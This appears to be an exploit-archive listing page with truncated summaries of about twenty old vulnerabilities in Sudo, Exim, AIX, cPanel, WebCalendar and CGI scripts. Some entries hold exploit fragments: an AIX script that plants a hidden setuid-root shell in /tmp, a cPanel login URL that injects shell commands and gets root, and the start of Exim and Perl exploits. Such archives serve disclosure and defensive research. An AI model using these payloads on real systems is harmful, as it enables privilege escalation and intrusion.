Sudo 1.6.x - Environment Variable Handling Security Bypass (2)

source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A local attacker with the ability to run Python scripts can...

Exim 4.42 - Local Privilege Escalation

!/bin/sh Local Lame R00T sploit for exim include int mainint argc, char argv char addrptr; addrptr = getenvargv1; printf"%s @ %p\n", argv1, addrptr; return 0; gcc @env.c -o @env cp @env /usr/bin cd /usr/exim/bin CODE=perl -e 'print...

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation

AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

Cpanel 9.1.0 have a problem ?

Hi all I found another problem in login script http://www.xxx.com:2082/login/?user=|"id"| it same the first it give ROOT & u can use "+" or "20" without any problem : ! lool look @ this: / sh: /var/cpanel/users/: is a directory sh: uid=0root gid=0root...

Herberlin BremsServer 1.2.4 - Cross-Site Scripting

Herberlin BremsServer 1.2.4 - Cross-Site Scripting source: https://www.securityfocus.com/bid/9491/info BremsServer has been reported to contain cross-site scripting vulnerabilities. This issue is due to the server failing to check or filter user strings that are sent to the server. An attacker ma...

Apache 2.0.4x mod_perl - File Descriptor Leakage (3)

source: https://www.securityfocus.com/bid/9471/info A vulnerability has been reported to exist in the Apache modperl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attack...

SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files

SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files include include include define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." define START 1 define END 33000 int mainint argc, char argv int i; char buf150; printf"\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n";...

WebCalendar long.php user_inc Parameter Traversal Arbitrary File Access

The remote installation of WebCalendar may allow an attacker to read arbitrary files on the remote host by supplying a filename to the 'userinc' argument of the file 'long.php'. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. include'deprecatednasllevel.inc'; include'compat.inc'; if...

Synkron.Web 3.0 - HTML Injection

Synkron.Web 3.0 - HTML Injection source: https://www.securityfocus.com/bid/7833/info Synkron.web is prone to HTML injection attacks. The vulnerability exists in the search script and is a result of insufficient sanitization of malicious HTML code from user-supplied input. HTML and script code may...

CVE-2003-0114

The file upload control in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to automatically upload files from the local system via a web page containing a script to upload the files...

PHP TopSites 2.0/2.2 - HTML Injection

source: https://www.securityfocus.com/bid/6621/info An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the tag of the description page, when submitting website, it may be possibl...

Achievo 0.70.80.9 - Remote File Inclusion Command Execution

Achievo 0.70.80.9 - Remote File Inclusion Command Execution source: https://www.securityfocus.com/bid/5552/info Achievo includes a PHP script which is used to generate JavaScript class.atkdateattribute.js.php. This script employs a number of PHP includeonce statements to call code contained in...

Ilia Alshanetsky FUDForum 1.2.81.9.82.0.2 - File Modification

Ilia Alshanetsky FUDForum 1.2.81.9.82.0.2 - File Modification source: https://www.securityfocus.com/bid/5502/info Reportedly, it is possible for an administrator to manipulate create, modify etc. files outside of the FUDForum directories. This vulnerability is present in the 'adm/admbrowse.php'...

b2 php remote command execution

Site: www.cafelog.com Vulnerable: b2 0.6pre2 and earlier. B2 is a php script which allows webmasters to quikly post news on the frontpage and let viewers interact with eachother. A bug exists in the scripts which allows an attacker to remotely execute commands. Exploit: Taken from...

CGIScript.net - csMailto Hidden Form Field Remote Command Execution

source: https://www.securityfocus.com/bid/4579/info CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script. Reportedly, configuration values used by the script are contained in hidden form values. As a...

NetCode NC Book 0.2b remote command execution vulnerability

more than 20 servers were successfly cracked using this 'little' hole ------ PoizonB0x Advisory6 pb0x-06-08-2001 --------- -NAME: NetCode NC Book 0.2b remote command execution vulnerability. -DESCRIPTION: NetCode's GuestBook. Find more info about it here: http://netcode.lgg.ru/vault/ncbook/...

WU-FTPD 2.42.52.6 Trolltech ftpd 1.2 ProFTPd 1.2 BeroFTPD 1.3.4 FTP - glob Expansion

WU-FTPD 2.42.52.6 Trolltech ftpd 1.2 ProFTPd 1.2 BeroFTPD 1.3.4 FTP - glob Expansion source: https://www.securityfocus.com/bid/2496/info Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits. Globbing generates...

Fastgraf's whois.cgi - Remote Command Execution

!/usr/bin/perl whois.pl - Marco van Berkum - [email protected] homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi DO NOT EDIT THIS HEADER, else the bedbugs will bite Greets to sigmo for finding stupid POST examples Also greetings to DUCKEL YES YOU HAVE CREDIT NOW ; Use like this:...

Insecure input validation in everythingform.cgi (remote command execution)

Hi All, This is Yet Another Bad Perl Script. everythingform.cgi uses a hidden field 'config' to determine where to read configuration data from. --code snippit-- .. $ConfigFile = $inconfig; .. openCONFIG, "$configdir$ConfigFile" || &Error"I can't open $ConfigFile in the ReadConfig subroutine...

Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution

Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution source: https://www.securityfocus.com/bid/2101/info An input validation vulnerability exists in Leif M. Wright's everything.cgi, a Perl-based form design tool. The script fails to properly filter shell commands from user-supplied...